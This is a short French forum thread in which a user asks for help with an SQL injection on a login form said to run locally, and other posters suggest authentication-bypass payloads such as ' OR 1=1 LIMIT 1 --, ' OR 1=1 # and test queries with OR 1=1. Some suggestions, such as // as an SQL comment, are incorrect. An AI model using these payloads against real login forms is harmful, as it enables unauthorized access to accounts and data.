AIDE Injection SQL

Tu ne fournis pas tout le code.

T'as essayé ça ?

' OR 1=1 LIMIT 1 --

Le 18 juin 2021 à 02:36:32 :
dans $username mets "nimportequelpseudo'; //"
jsp en vrai, c'est comme ça que je ferais

Non ça veut pas, pourtant je comprends pas la syntaxe est bonne, il y a clairement une faille dans la requête..

Le 18 juin 2021 à 02:37:06 :
Tu ne fournis pas tout le code.

T'as essayé ça ?

' OR 1=1 LIMIT 1 --

Il est plutot long ça sert pas à grand chose, tant qu'il y a la query non?
J'ai essayé, ça veut pas

Le 18 juin 2021 à 02:41:06 -erezan- a écrit :
dans username tu saisis
' OR 1=1 #
ou
' OR 1=1 //

Non khey, ça veut pas
C'est que c'est patché alors?

c'est en local khey> Le 18 juin 2021 à 02:42:51 Centlaflique a écrit :

c'est quoi l'url ?

Essaye de saisir directement ça dans ta console SQL pour voir si ça passe :

select * from user where username='admin' and password='' OR 1=1; #';

ou ça :

select * from user where username='admin' and password='' OR 1=1; //';

Le 18 juin 2021 à 02:49:18 -erezan- a écrit :
Essaye de saisir directement ça dans ta console SQL pour voir si ça passe :

select * from user where username='admin' and password='' OR 1=1; #';

ou ça :

select * from user where username='admin' and password='' OR 1=1; //';

ça affiche la table user